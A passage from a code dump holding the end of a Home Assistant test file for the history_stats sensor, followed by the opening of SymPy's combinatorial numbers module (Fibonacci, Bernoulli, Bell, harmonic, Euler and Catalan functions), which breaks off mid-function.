setup.\"\"\"\n self.init_recorder()\n config = {\n 'history': {\n },\n 'sensor': {\n 'platform': 'history_stats',\n 'entity_id': 'binary_sensor.test_id',\n 'state': 'on',\n 'start': '{{ now().replace(hour=0)'\n '.replace(minute=0).replace(second=0) }}',\n 'duration': '02:00',\n 'name': 'Test',\n }\n }\n\n self.assertTrue(setup_component(self.hass, 'sensor', config))\n\n state = self.hass.states.get('sensor.test')\n self.assertEqual(state.state, STATE_UNKNOWN)\n\n def test_period_parsing(self):\n \"\"\"Test the conversion from templates to period.\"\"\"\n today = Template('{{ now().replace(hour=0).replace(minute=0)'\n '.replace(second=0) }}', self.hass)\n duration = timedelta(hours=2, minutes=1)\n\n sensor1 = HistoryStatsSensor(\n self.hass, 'test', 'on', today, None, duration, 'time', 'test')\n sensor2 = HistoryStatsSensor(\n self.hass, 'test', 'on', None, today, duration, 'time', 'test')\n\n sensor1.update_period()\n sensor1_start, sensor1_end = sensor1._period\n sensor2.update_period()\n sensor2_start, sensor2_end = sensor2._period\n\n # Start = 00:00:00\n self.assertEqual(sensor1_start.hour, 0)\n self.assertEqual(sensor1_start.minute, 0)\n self.assertEqual(sensor1_start.second, 0)\n\n # End = 02:01:00\n self.assertEqual(sensor1_end.hour, 2)\n self.assertEqual(sensor1_end.minute, 1)\n self.assertEqual(sensor1_end.second, 0)\n\n # Start = 21:59:00\n self.assertEqual(sensor2_start.hour, 21)\n self.assertEqual(sensor2_start.minute, 59)\n self.assertEqual(sensor2_start.second, 0)\n\n # End = 00:00:00\n self.assertEqual(sensor2_end.hour, 0)\n self.assertEqual(sensor2_end.minute, 0)\n self.assertEqual(sensor2_end.second, 0)\n\n def test_measure(self):\n \"\"\"Test the history statistics sensor measure.\"\"\"\n t0 = dt_util.utcnow() - timedelta(minutes=40)\n t1 = t0 + timedelta(minutes=20)\n t2 = dt_util.utcnow() - timedelta(minutes=10)\n\n # Start t0 t1 t2 End\n # |--20min--|--20min--|--10min--|--10min--|\n # |---off---|---on----|---off---|---on----|\n\n fake_states = {\n 'binary_sensor.test_id': [\n ha.State('binary_sensor.test_id', 'on', last_changed=t0),\n ha.State('binary_sensor.test_id', 'off', last_changed=t1),\n ha.State('binary_sensor.test_id', 'on', last_changed=t2),\n ]\n }\n\n start = Template('{{ as_timestamp(now()) - 3600 }}', self.hass)\n end = Template('{{ now() }}', self.hass)\n\n sensor1 = HistoryStatsSensor(\n self.hass, 'binary_sensor.test_id', 'on', start, end, None,\n 'time', 'Test')\n\n sensor2 = HistoryStatsSensor(\n self.hass, 'unknown.id', 'on', start, end, None, 'time', 'Test')\n\n sensor3 = HistoryStatsSensor(\n self.hass, 'binary_sensor.test_id', 'on', start, end, None,\n 'count', 'test')\n\n sensor4 = HistoryStatsSensor(\n self.hass, 'binary_sensor.test_id', 'on', start, end, None,\n 'ratio', 'test')\n\n self.assertEqual(sensor1._type, 'time')\n self.assertEqual(sensor3._type, 'count')\n self.assertEqual(sensor4._type, 'ratio')\n\n with patch('homeassistant.components.history.'\n 'state_changes_during_period', return_value=fake_states):\n with patch('homeassistant.components.history.get_state',\n return_value=None):\n sensor1.update()\n sensor2.update()\n sensor3.update()\n sensor4.update()\n\n self.assertEqual(sensor1.state, 0.5)\n self.assertEqual(sensor2.state, None)\n self.assertEqual(sensor3.state, 2)\n self.assertEqual(sensor4.state, 50)\n\n def test_wrong_date(self):\n \"\"\"Test when start or end value is not a timestamp or a date.\"\"\"\n good = Template('{{ now() }}', self.hass)\n bad = Template('{{ TEST }}', self.hass)\n\n sensor1 = HistoryStatsSensor(\n self.hass, 'test', 'on', good, bad, None, 'time', 'Test')\n sensor2 = HistoryStatsSensor(\n self.hass, 'test', 'on', bad, good, None, 'time', 'Test')\n\n before_update1 = sensor1._period\n before_update2 = sensor2._period\n\n sensor1.update_period()\n sensor2.update_period()\n\n self.assertEqual(before_update1, sensor1._period)\n self.assertEqual(before_update2, sensor2._period)\n\n def test_wrong_duration(self):\n \"\"\"Test when duration value is not a timedelta.\"\"\"\n self.init_recorder()\n config = {\n 'history': {\n },\n 'sensor': {\n 'platform': 'history_stats',\n 'entity_id': 'binary_sensor.test_id',\n 'name': 'Test',\n 'state': 'on',\n 'start': '{{ now() }}',\n 'duration': 'TEST',\n }\n }\n\n setup_component(self.hass, 'sensor', config)\n self.assertEqual(self.hass.states.get('sensor.test'), None)\n self.assertRaises(TypeError,\n setup_component(self.hass, 'sensor', config))\n\n def test_bad_template(self):\n \"\"\"Test Exception when the template cannot be parsed.\"\"\"\n bad = Template('{{ x - 12 }}', self.hass) # x is undefined\n duration = '01:00'\n\n sensor1 = HistoryStatsSensor(\n self.hass, 'test', 'on', bad, None, duration, 'time', 'Test')\n sensor2 = HistoryStatsSensor(\n self.hass, 'test', 'on', None, bad, duration, 'time', 'Test')\n\n before_update1 = sensor1._period\n before_update2 = sensor2._period\n\n sensor1.update_period()\n sensor2.update_period()\n\n self.assertEqual(before_update1, sensor1._period)\n self.assertEqual(before_update2, sensor2._period)\n\n def test_not_enough_arguments(self):\n \"\"\"Test config when not enough arguments provided.\"\"\"\n self.init_recorder()\n config = {\n 'history': {\n },\n 'sensor': {\n 'platform': 'history_stats',\n 'entity_id': 'binary_sensor.test_id',\n 'name': 'Test',\n 'state': 'on',\n 'start': '{{ now() }}',\n }\n }\n\n setup_component(self.hass, 'sensor', config)\n self.assertEqual(self.hass.states.get('sensor.test'), None)\n self.assertRaises(TypeError,\n setup_component(self.hass, 'sensor', config))\n\n def test_too_many_arguments(self):\n \"\"\"Test config when too many arguments provided.\"\"\"\n self.init_recorder()\n config = {\n 'history': {\n },\n 'sensor': {\n 'platform': 'history_stats',\n 'entity_id': 'binary_sensor.test_id',\n 'name': 'Test',\n 'state': 'on',\n 'start': '{{ as_timestamp(now()) - 3600 }}',\n 'end': '{{ now() }}',\n 'duration': '01:00',\n }\n }\n\n setup_component(self.hass, 'sensor', config)\n self.assertEqual(self.hass.states.get('sensor.test'), None)\n self.assertRaises(TypeError,\n setup_component(self.hass, 'sensor', config))\n\n def init_recorder(self):\n \"\"\"Initialize the recorder.\"\"\"\n init_recorder_component(self.hass)\n self.hass.start()\n"} {"ext": "py", "sha": "1a2ec0ab7acb5ec52077bad2e5cfd184845ed972", "content": "\"\"\"\nThis module implements some special functions that commonly appear in\ncombinatorial contexts (e.g. in power series); in particular,\nsequences of rational numbers such as Bernoulli and Fibonacci numbers.\n\nFactorials, binomial coefficients and related functions are located in\nthe separate 'factorials' module.\n\"\"\"\n\nfrom __future__ import print_function, division\n\nfrom sympy.core import S, Symbol, Rational, Integer, Add, Dummy\nfrom sympy.core.compatibility import as_int, SYMPY_INTS, range\nfrom sympy.core.cache import cacheit\nfrom sympy.core.function import Function, expand_mul\nfrom sympy.core.numbers import E, pi\nfrom sympy.core.relational import LessThan, StrictGreaterThan\nfrom sympy.functions.combinatorial.factorials import binomial, factorial\nfrom sympy.functions.elementary.exponential import log\nfrom sympy.functions.elementary.integers import floor\nfrom sympy.functions.elementary.trigonometric import sin, cos, cot\nfrom sympy.functions.elementary.miscellaneous import sqrt\nfrom sympy.utilities.memoization import recurrence_memo\n\nfrom mpmath import bernfrac, workprec\nfrom mpmath.libmp import ifib as _ifib\n\n\ndef _product(a, b):\n p = 1\n for k in range(a, b + 1):\n p *= k\n return p\n\n\n\n# Dummy symbol used for computing polynomial sequences\n_sym = Symbol('x')\n_symbols = Function('x')\n\n\n#----------------------------------------------------------------------------#\n# #\n# Fibonacci numbers #\n# #\n#----------------------------------------------------------------------------#\n\nclass fibonacci(Function):\n r\"\"\"\n Fibonacci numbers / Fibonacci polynomials\n\n The Fibonacci numbers are the integer sequence defined by the\n initial terms F_0 = 0, F_1 = 1 and the two-term recurrence\n relation F_n = F_{n-1} + F_{n-2}. This definition\n extended to arbitrary real and complex arguments using\n the formula\n\n .. math :: F_z = \\frac{\\phi^z - \\cos(\\pi z) \\phi^{-z}}{\\sqrt 5}\n\n The Fibonacci polynomials are defined by F_1(x) = 1,\n F_2(x) = x, and F_n(x) = x*F_{n-1}(x) + F_{n-2}(x) for n > 2.\n For all positive integers n, F_n(1) = F_n.\n\n * fibonacci(n) gives the nth Fibonacci number, F_n\n * fibonacci(n, x) gives the nth Fibonacci polynomial in x, F_n(x)\n\n Examples\n ========\n\n >>> from sympy import fibonacci, Symbol\n\n >>> [fibonacci(x) for x in range(11)]\n [0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55]\n >>> fibonacci(5, Symbol('t'))\n t**4 + 3*t**2 + 1\n\n References\n ==========\n\n .. [1] http://en.wikipedia.org/wiki/Fibonacci_number\n .. [2] http://mathworld.wolfram.com/FibonacciNumber.html\n\n See Also\n ========\n\n bell, bernoulli, catalan, euler, harmonic, lucas\n \"\"\"\n\n @staticmethod\n def _fib(n):\n return _ifib(n)\n\n @staticmethod\n @recurrence_memo([None, S.One, _sym])\n def _fibpoly(n, prev):\n return (prev[-2] + _sym*prev[-1]).expand()\n\n @classmethod\n def eval(cls, n, sym=None):\n if n is S.Infinity:\n return S.Infinity\n\n if n.is_Integer:\n n = int(n)\n if n < 0:\n return S.NegativeOne**(n + 1) * fibonacci(-n)\n if sym is None:\n return Integer(cls._fib(n))\n else:\n if n < 1:\n raise ValueError(\"Fibonacci polynomials are defined \"\n \"only for positive integer indices.\")\n return cls._fibpoly(n).subs(_sym, sym)\n\n def _eval_rewrite_as_sqrt(self, n):\n return 2**(-n)*sqrt(5)*((1 + sqrt(5))**n - (-sqrt(5) + 1)**n) / 5\n\n def _eval_rewrite_as_GoldenRatio(self,n):\n return (S.GoldenRatio**n - 1/(-S.GoldenRatio)**n)/(2*S.GoldenRatio-1)\n\n\nclass lucas(Function):\n \"\"\"\n Lucas numbers\n\n Lucas numbers satisfy a recurrence relation similar to that of\n the Fibonacci sequence, in which each term is the sum of the\n preceding two. They are generated by choosing the initial\n values L_0 = 2 and L_1 = 1.\n\n * lucas(n) gives the nth Lucas number\n\n Examples\n ========\n\n >>> from sympy import lucas\n\n >>> [lucas(x) for x in range(11)]\n [2, 1, 3, 4, 7, 11, 18, 29, 47, 76, 123]\n\n References\n ==========\n\n .. [1] http://en.wikipedia.org/wiki/Lucas_number\n .. [2] http://mathworld.wolfram.com/LucasNumber.html\n\n See Also\n ========\n\n bell, bernoulli, catalan, euler, fibonacci, harmonic\n \"\"\"\n\n @classmethod\n def eval(cls, n):\n if n is S.Infinity:\n return S.Infinity\n\n if n.is_Integer:\n return fibonacci(n + 1) + fibonacci(n - 1)\n\n def _eval_rewrite_as_sqrt(self, n):\n return 2**(-n)*((1 + sqrt(5))**n + (-sqrt(5) + 1)**n)\n\n#----------------------------------------------------------------------------#\n# #\n# Bernoulli numbers #\n# #\n#----------------------------------------------------------------------------#\n\n\nclass bernoulli(Function):\n r\"\"\"\n Bernoulli numbers / Bernoulli polynomials\n\n The Bernoulli numbers are a sequence of rational numbers\n defined by B_0 = 1 and the recursive relation (n > 0)::\n\n n\n ___\n \\ / n + 1 \\\n 0 = ) | | * B .\n /___ \\ k / k\n k = 0\n\n They are also commonly defined by their exponential generating\n function, which is x/(exp(x) - 1). For odd indices > 1, the\n Bernoulli numbers are zero.\n\n The Bernoulli polynomials satisfy the analogous formula::\n\n n\n ___\n \\ / n \\ n-k\n B (x) = ) | | * B * x .\n n /___ \\ k / k\n k = 0\n\n Bernoulli numbers and Bernoulli polynomials are related as\n B_n(0) = B_n.\n\n We compute Bernoulli numbers using Ramanujan's formula::\n\n / n + 3 \\\n B = (A(n) - S(n)) / | |\n n \\ n /\n\n where A(n) = (n+3)/3 when n = 0 or 2 (mod 6), A(n) = -(n+3)/6\n when n = 4 (mod 6), and::\n\n [n/6]\n ___\n \\ / n + 3 \\\n S(n) = ) | | * B\n /___ \\ n - 6*k / n-6*k\n k = 1\n\n This formula is similar to the sum given in the definition, but\n cuts 2/3 of the terms. For Bernoulli polynomials, we use the\n formula in the definition.\n\n * bernoulli(n) gives the nth Bernoulli number, B_n\n * bernoulli(n, x) gives the nth Bernoulli polynomial in x, B_n(x)\n\n Examples\n ========\n\n >>> from sympy import bernoulli\n\n >>> [bernoulli(n) for n in range(11)]\n [1, -1/2, 1/6, 0, -1/30, 0, 1/42, 0, -1/30, 0, 5/66]\n >>> bernoulli(1000001)\n 0\n\n References\n ==========\n\n .. [1] http://en.wikipedia.org/wiki/Bernoulli_number\n .. [2] http://en.wikipedia.org/wiki/Bernoulli_polynomial\n .. [3] http://mathworld.wolfram.com/BernoulliNumber.html\n .. [4] http://mathworld.wolfram.com/BernoulliPolynomial.html\n\n See Also\n ========\n\n bell, catalan, euler, fibonacci, harmonic, lucas\n \"\"\"\n\n # Calculates B_n for positive even n\n @staticmethod\n def _calc_bernoulli(n):\n s = 0\n a = int(binomial(n + 3, n - 6))\n for j in range(1, n//6 + 1):\n s += a * bernoulli(n - 6*j)\n # Avoid computing each binomial coefficient from scratch\n a *= _product(n - 6 - 6*j + 1, n - 6*j)\n a //= _product(6*j + 4, 6*j + 9)\n if n % 6 == 4:\n s = -Rational(n + 3, 6) - s\n else:\n s = Rational(n + 3, 3) - s\n return s / binomial(n + 3, n)\n\n # We implement a specialized memoization scheme to handle each\n # case modulo 6 separately\n _cache = {0: S.One, 2: Rational(1, 6), 4: Rational(-1, 30)}\n _highest = {0: 0, 2: 2, 4: 4}\n\n @classmethod\n def eval(cls, n, sym=None):\n if n.is_Number:\n if n.is_Integer and n.is_nonnegative:\n if n is S.Zero:\n return S.One\n elif n is S.One:\n if sym is None:\n return -S.Half\n else:\n return sym - S.Half\n # Bernoulli numbers\n elif sym is None:\n if n.is_odd:\n return S.Zero\n n = int(n)\n # Use mpmath for enormous Bernoulli numbers\n if n > 500:\n p, q = bernfrac(n)\n return Rational(int(p), int(q))\n case = n % 6\n highest_cached = cls._highest[case]\n if n <= highest_cached:\n return cls._cache[n]\n # To avoid excessive recursion when, say, bernoulli(1000) is\n # requested, calculate and cache the entire sequence ... B_988,\n # B_994, B_1000 in increasing order\n for i in range(highest_cached + 6, n + 6, 6):\n b = cls._calc_bernoulli(i)\n cls._cache[i] = b\n cls._highest[case] = i\n return b\n # Bernoulli polynomials\n else:\n n, result = int(n), []\n for k in range(n + 1):\n result.append(binomial(n, k)*cls(k)*sym**(n - k))\n return Add(*result)\n else:\n raise ValueError(\"Bernoulli numbers are defined only\"\n \" for nonnegative integer indices.\")\n\n if sym is None:\n if n.is_odd and (n - 1).is_positive:\n return S.Zero\n\n\n#----------------------------------------------------------------------------#\n# #\n# Bell numbers #\n# #\n#----------------------------------------------------------------------------#\n\nclass bell(Function):\n r\"\"\"\n Bell numbers / Bell polynomials\n\n The Bell numbers satisfy `B_0 = 1` and\n\n .. math:: B_n = \\sum_{k=0}^{n-1} \\binom{n-1}{k} B_k.\n\n They are also given by:\n\n .. math:: B_n = \\frac{1}{e} \\sum_{k=0}^{\\infty} \\frac{k^n}{k!}.\n\n The Bell polynomials are given by `B_0(x) = 1` and\n\n .. math:: B_n(x) = x \\sum_{k=1}^{n-1} \\binom{n-1}{k-1} B_{k-1}(x).\n\n The second kind of Bell polynomials (are sometimes called \"partial\" Bell\n polynomials or incomplete Bell polynomials) are defined as\n\n .. math:: B_{n,k}(x_1, x_2,\\dotsc x_{n-k+1}) =\n \\sum_{j_1+j_2+j_2+\\dotsb=k \\atop j_1+2j_2+3j_2+\\dotsb=n}\n \\frac{n!}{j_1!j_2!\\dotsb j_{n-k+1}!}\n \\left(\\frac{x_1}{1!} \\right)^{j_1}\n \\left(\\frac{x_2}{2!} \\right)^{j_2} \\dotsb\n \\left(\\frac{x_{n-k+1}}{(n-k+1)!} \\right) ^{j_{n-k+1}}.\n\n * bell(n) gives the `n^{th}` Bell number, `B_n`.\n * bell(n, x) gives the `n^{th}` Bell polynomial, `B_n(x)`.\n * bell(n, k, (x1, x2, ...)) gives Bell polynomials of the second kind,\n `B_{n,k}(x_1, x_2, \\dotsc, x_{n-k+1})`.\n\n Notes\n =====\n\n Not to be confused with Bernoulli numbers and Bernoulli polynomials,\n which use the same notation.\n\n Examples\n ========\n\n >>> from sympy import bell, Symbol, symbols\n\n >>> [bell(n) for n in range(11)]\n [1, 1, 2, 5, 15, 52, 203, 877, 4140, 21147, 115975]\n >>> bell(30)\n 846749014511809332450147\n >>> bell(4, Symbol('t'))\n t**4 + 6*t**3 + 7*t**2 + t\n >>> bell(6, 2, symbols('x:6')[1:])\n 6*x1*x5 + 15*x2*x4 + 10*x3**2\n\n References\n ==========\n\n .. [1] http://en.wikipedia.org/wiki/Bell_number\n .. [2] http://mathworld.wolfram.com/BellNumber.html\n .. [3] http://mathworld.wolfram.com/BellPolynomial.html\n\n See Also\n ========\n\n bernoulli, catalan, euler, fibonacci, harmonic, lucas\n \"\"\"\n\n @staticmethod\n @recurrence_memo([1, 1])\n def _bell(n, prev):\n s = 1\n a = 1\n for k in range(1, n):\n a = a * (n - k) // k\n s += a * prev[k]\n return s\n\n @staticmethod\n @recurrence_memo([S.One, _sym])\n def _bell_poly(n, prev):\n s = 1\n a = 1\n for k in range(2, n + 1):\n a = a * (n - k + 1) // (k - 1)\n s += a * prev[k - 1]\n return expand_mul(_sym * s)\n\n @staticmethod\n def _bell_incomplete_poly(n, k, symbols):\n r\"\"\"\n The second kind of Bell polynomials (incomplete Bell polynomials).\n\n Calculated by recurrence formula:\n\n .. math:: B_{n,k}(x_1, x_2, \\dotsc, x_{n-k+1}) =\n \\sum_{m=1}^{n-k+1}\n \\x_m \\binom{n-1}{m-1} B_{n-m,k-1}(x_1, x_2, \\dotsc, x_{n-m-k})\n\n where\n B_{0,0} = 1;\n B_{n,0} = 0; for n>=1\n B_{0,k} = 0; for k>=1\n\n \"\"\"\n if (n == 0) and (k == 0):\n return S.One\n elif (n == 0) or (k == 0):\n return S.Zero\n s = S.Zero\n a = S.One\n for m in range(1, n - k + 2):\n s += a * bell._bell_incomplete_poly(\n n - m, k - 1, symbols) * symbols[m - 1]\n a = a * (n - m) / m\n return expand_mul(s)\n\n @classmethod\n def eval(cls, n, k_sym=None, symbols=None):\n if n.is_Integer and n.is_nonnegative:\n if k_sym is None:\n return Integer(cls._bell(int(n)))\n elif symbols is None:\n return cls._bell_poly(int(n)).subs(_sym, k_sym)\n else:\n r = cls._bell_incomplete_poly(int(n), int(k_sym), symbols)\n return r\n\n def _eval_rewrite_as_Sum(self, n, k_sym=None, symbols=None):\n from sympy import Sum\n if (k_sym is not None) or (symbols is not None):\n return self\n\n # Dobinski's formula\n if not n.is_nonnegative:\n return self\n k = Dummy('k', integer=True, nonnegative=True)\n return 1 / E * Sum(k**n / factorial(k), (k, 0, S.Infinity))\n\n#----------------------------------------------------------------------------#\n# #\n# Harmonic numbers #\n# #\n#----------------------------------------------------------------------------#\n\n\nclass harmonic(Function):\n r\"\"\"\n Harmonic numbers\n\n The nth harmonic number is given by `\\operatorname{H}_{n} =\n 1 + \\frac{1}{2} + \\frac{1}{3} + \\ldots + \\frac{1}{n}`.\n\n More generally:\n\n .. math:: \\operatorname{H}_{n,m} = \\sum_{k=1}^{n} \\frac{1}{k^m}\n\n As `n \\rightarrow \\infty`, `\\operatorname{H}_{n,m} \\rightarrow \\zeta(m)`,\n the Riemann zeta function.\n\n * ``harmonic(n)`` gives the nth harmonic number, `\\operatorname{H}_n`\n\n * ``harmonic(n, m)`` gives the nth generalized harmonic number\n of order `m`, `\\operatorname{H}_{n,m}`, where\n ``harmonic(n) == harmonic(n, 1)``\n\n Examples\n ========\n\n >>> from sympy import harmonic, oo\n\n >>> [harmonic(n) for n in range(6)]\n [0, 1, 3/2, 11/6, 25/12, 137/60]\n >>> [harmonic(n, 2) for n in range(6)]\n [0, 1, 5/4, 49/36, 205/144, 5269/3600]\n >>> harmonic(oo, 2)\n pi**2/6\n\n >>> from sympy import Symbol, Sum\n >>> n = Symbol(\"n\")\n\n >>> harmonic(n).rewrite(Sum)\n Sum(1/_k, (_k, 1, n))\n\n We can evaluate harmonic numbers for all integral and positive\n rational arguments:\n\n >>> from sympy import S, expand_func, simplify\n >>> harmonic(8)\n 761/280\n >>> harmonic(11)\n 83711/27720\n\n >>> H = harmonic(1/S(3))\n >>> H\n harmonic(1/3)\n >>> He = expand_func(H)\n >>> He\n -log(6) - sqrt(3)*pi/6 + 2*Sum(log(sin(_k*pi/3))*cos(2*_k*pi/3), (_k, 1, 1))\n + 3*Sum(1/(3*_k + 1), (_k, 0, 0))\n >>> He.doit()\n -log(6) - sqrt(3)*pi/6 - log(sqrt(3)/2) + 3\n >>> H = harmonic(25/S(7))\n >>> He = simplify(expand_func(H).doit())\n >>> He\n log(sin(pi/7)**(-2*cos(pi/7))*sin(2*pi/7)**(2*cos(16*pi/7))*cos(pi/14)**(-2*sin(pi/14))/14)\n + pi*tan(pi/14)/2 + 30247/9900\n >>> He.n(40)\n 1.983697455232980674869851942390639915940\n >>> harmonic(25/S(7)).n(40)\n 1.983697455232980674869851942390639915940\n\n We can rewrite harmonic numbers in terms of polygamma functions:\n\n >>> from sympy import digamma, polygamma\n >>> m = Symbol(\"m\")\n\n >>> harmonic(n).rewrite(digamma)\n polygamma(0, n + 1) + EulerGamma\n\n >>> harmonic(n).rewrite(polygamma)\n polygamma(0, n + 1) + EulerGamma\n\n >>> harmonic(n,3).rewrite(polygamma)\n polygamma(2, n + 1)/2 - polygamma(2, 1)/2\n\n >>> harmonic(n,m).rewrite(polygamma)\n (-1)**m*(polygamma(m - 1, 1) - polygamma(m - 1, n + 1))/factorial(m - 1)\n\n Integer offsets in the argument can be pulled out:\n\n >>> from sympy import expand_func\n\n >>> expand_func(harmonic(n+4))\n harmonic(n) + 1/(n + 4) + 1/(n + 3) + 1/(n + 2) + 1/(n + 1)\n\n >>> expand_func(harmonic(n-4))\n harmonic(n) - 1/(n - 1) - 1/(n - 2) - 1/(n - 3) - 1/n\n\n Some limits can be computed as well:\n\n >>> from sympy import limit, oo\n\n >>> limit(harmonic(n), n, oo)\n oo\n\n >>> limit(harmonic(n, 2), n, oo)\n pi**2/6\n\n >>> limit(harmonic(n, 3), n, oo)\n -polygamma(2, 1)/2\n\n However we can not compute the general relation yet:\n\n >>> limit(harmonic(n, m), n, oo)\n harmonic(oo, m)\n\n which equals ``zeta(m)`` for ``m > 1``.\n\n References\n ==========\n\n .. [1] http://en.wikipedia.org/wiki/Harmonic_number\n .. [2] http://functions.wolfram.com/GammaBetaErf/HarmonicNumber/\n .. [3] http://functions.wolfram.com/GammaBetaErf/HarmonicNumber2/\n\n See Also\n ========\n\n bell, bernoulli, catalan, euler, fibonacci, lucas\n \"\"\"\n\n # Generate one memoized Harmonic number-generating function for each\n # order and store it in a dictionary\n _functions = {}\n\n @classmethod\n def eval(cls, n, m=None):\n from sympy import zeta\n if m is S.One:\n return cls(n)\n if m is None:\n m = S.One\n\n if m.is_zero:\n return n\n\n if n is S.Infinity and m.is_Number:\n # TODO: Fix for symbolic values of m\n if m.is_negative:\n return S.NaN\n elif LessThan(m, S.One):\n return S.Infinity\n elif StrictGreaterThan(m, S.One):\n return zeta(m)\n else:\n return cls\n\n if n.is_Integer and n.is_nonnegative and m.is_Integer:\n if n == 0:\n return S.Zero\n if not m in cls._functions:\n @recurrence_memo([0])\n def f(n, prev):\n return prev[-1] + S.One / n**m\n cls._functions[m] = f\n return cls._functions[m](int(n))\n\n def _eval_rewrite_as_polygamma(self, n, m=1):\n from sympy.functions.special.gamma_functions import polygamma\n return S.NegativeOne**m/factorial(m - 1) * (polygamma(m - 1, 1) - polygamma(m - 1, n + 1))\n\n def _eval_rewrite_as_digamma(self, n, m=1):\n from sympy.functions.special.gamma_functions import polygamma\n return self.rewrite(polygamma)\n\n def _eval_rewrite_as_trigamma(self, n, m=1):\n from sympy.functions.special.gamma_functions import polygamma\n return self.rewrite(polygamma)\n\n def _eval_rewrite_as_Sum(self, n, m=None):\n from sympy import Sum\n k = Dummy(\"k\", integer=True)\n if m is None:\n m = S.One\n return Sum(k**(-m), (k, 1, n))\n\n def _eval_expand_func(self, **hints):\n from sympy import Sum\n n = self.args[0]\n m = self.args[1] if len(self.args) == 2 else 1\n\n if m == S.One:\n if n.is_Add:\n off = n.args[0]\n nnew = n - off\n if off.is_Integer and off.is_positive:\n result = [S.One/(nnew + i) for i in range(off, 0, -1)] + [harmonic(nnew)]\n return Add(*result)\n elif off.is_Integer and off.is_negative:\n result = [-S.One/(nnew + i) for i in range(0, off, -1)] + [harmonic(nnew)]\n return Add(*result)\n\n if n.is_Rational:\n # Expansions for harmonic numbers at general rational arguments (u + p/q)\n # Split n as u + p/q with p < q\n p, q = n.as_numer_denom()\n u = p // q\n p = p - u * q\n if u.is_nonnegative and p.is_positive and q.is_positive and p < q:\n k = Dummy(\"k\")\n t1 = q * Sum(1 / (q * k + p), (k, 0, u))\n t2 = 2 * Sum(cos((2 * pi * p * k) / S(q)) *\n log(sin((pi * k) / S(q))),\n (k, 1, floor((q - 1) / S(2))))\n t3 = (pi / 2) * cot((pi * p) / q) + log(2 * q)\n return t1 + t2 - t3\n\n return self\n\n def _eval_rewrite_as_tractable(self, n, m=1):\n from sympy import polygamma\n return self.rewrite(polygamma).rewrite(\"tractable\", deep=True)\n\n def _eval_evalf(self, prec):\n from sympy import polygamma\n if all(i.is_number for i in self.args):\n return self.rewrite(polygamma)._eval_evalf(prec)\n\n\n#----------------------------------------------------------------------------#\n# #\n# Euler numbers #\n# #\n#----------------------------------------------------------------------------#\n\n\nclass euler(Function):\n r\"\"\"\n Euler numbers\n\n The euler numbers are given by::\n\n 2*n+1 k\n ___ ___ j 2*n+1\n \\ \\ / k \\ (-1) * (k-2*j)\n E = I ) ) | | --------------------\n 2n /___ /___ \\ j / k k\n k = 1 j = 0 2 * I * k\n\n E = 0\n 2n+1\n\n * euler(n) gives the n-th Euler number, E_n\n\n Examples\n ========\n\n >>> from sympy import Symbol\n >>> from sympy.functions import euler\n >>> [euler(n) for n in range(10)]\n [1, 0, -1, 0, 5, 0, -61, 0, 1385, 0]\n >>> n = Symbol(\"n\")\n >>> euler(n+2*n)\n euler(3*n)\n\n References\n ==========\n\n .. [1] http://en.wikipedia.org/wiki/Euler_numbers\n .. [2] http://mathworld.wolfram.com/EulerNumber.html\n .. [3] http://en.wikipedia.org/wiki/Alternating_permutation\n .. [4] http://mathworld.wolfram.com/AlternatingPermutation.html\n\n See Also\n ========\n\n bell, bernoulli, catalan, fibonacci, harmonic, lucas\n \"\"\"\n\n @classmethod\n def eval(cls, m):\n if m.is_odd:\n return S.Zero\n if m.is_Integer and m.is_nonnegative:\n from mpmath import mp\n m = m._to_mpmath(mp.prec)\n res = mp.eulernum(m, exact=True)\n return Integer(res)\n\n def _eval_rewrite_as_Sum(self, arg):\n from sympy import Sum\n if arg.is_even:\n k = Dummy(\"k\", integer=True)\n j = Dummy(\"j\", integer=True)\n n = self.args[0] / 2\n Em = (S.ImaginaryUnit * Sum(Sum(binomial(k, j) * ((-1)**j * (k - 2*j)**(2*n + 1)) /\n (2**k*S.ImaginaryUnit**k * k), (j, 0, k)), (k, 1, 2*n + 1)))\n\n return Em\n\n def _eval_evalf(self, prec):\n m = self.args[0]\n\n if m.is_Integer and m.is_nonnegative:\n from mpmath import mp\n from sympy import Expr\n m = m._to_mpmath(prec)\n with workprec(prec):\n res = mp.eulernum(m)\n return Expr._from_mpmath(res, prec)\n\n#----------------------------------------------------------------------------#\n# #\n# Catalan numbers #\n# #\n#----------------------------------------------------------------------------#\n\n\nclass catalan(Function):\n r\"\"\"\n Catalan numbers\n\n The n-th catalan number is given by::\n\n 1 / 2*n \\\n C = ----- | |\n n n + 1 \\ n /\n\n * catalan(n) gives the n-th Catalan number, C_n\n\n Examples\n ========\n\n >>> from sympy import (Symbol, binomial, gamma, hyper, polygamma,\n ... catalan, diff, combsimp, Rational, I)\n\n >>> [ catalan(i) for i in range(1,10) ]\n [1, 2, 5, 14, 42, 132, 429, 1430, 4862]\n\n >>> n = Symbol(\"n\", integer=True)\n\n >>> catalan(n)\n catalan(n)\n\n Catalan numbers can be transformed into several other, identical\n expressions involving other mathematical functions\n\n >>> catalan(n).rewrite(binomial)\n binomial(2*n, n)/(n + 1)\n\n >>> catalan(n).rewrite(gamma)\n 4**n*gamma(n + 1/2)/(sqrt(pi)*gamma(n + 2))\n\n >>> catalan(n).rewrite(hyper)\n hyper((-n + 1, -n), (2,), 1)\n\n For some non-integer values of n we can get closed form\n expressions by rewriting in terms of gamma functions:\n\n >>> catalan(Rational(1,2)).rewrite(gamma)\n 8/(3*pi)\n\n We can differentiate the Catalan numbers C(n) interpreted as a\n continuous real funtion in n:\n\n >>> diff(catalan(n), n)\n (polygamma(0, n + 1/2) - polygamma(0, n + 2) + log(4))*catalan(n)\n\n As a more advanced example consider the following ratio\n between consecutive numbers:\n\n >>> combsimp((catalan(n + 1)/catalan(n)).rewrite(binomial))\n 2*(2*n + 1)/(n + 2)\n\n The Catalan numbers can be generalized to complex numbers:\n\n >>> catalan(I).rewrite(gamma)\n 4**I*gamma(1/2 + I)/(sqrt(pi)*gamma(2 + I))\n\n and evaluated with arbitrary precision:\n\n >>> catalan(I).evalf(20)\n 0.39764993382373624267 - 0.020884341620842555705*I\n\n References\n ==========\n\n .. [1] http://en.wikipedia.org/wiki/Catalan_number\n .. [2] http://mathworld.wolfram.com/CatalanNumber.html\n .. [3] http://functions.wolfram.com/GammaBetaErf/CatalanNumber/\n .. [4] http://geometer.org/mathcircles/catalan.pdf\n\n See Also\n ========\n\n bell, bernoulli, euler, fibonacci, harmonic, lucas\n sympy.functions.combinatorial.factorials.binomial\n \"\"\"\n\n @classmethod\n def eval(cls, n):\n from sympy import gamma\n if (n.is_Integer and n.is_nonnegative) or \\\n 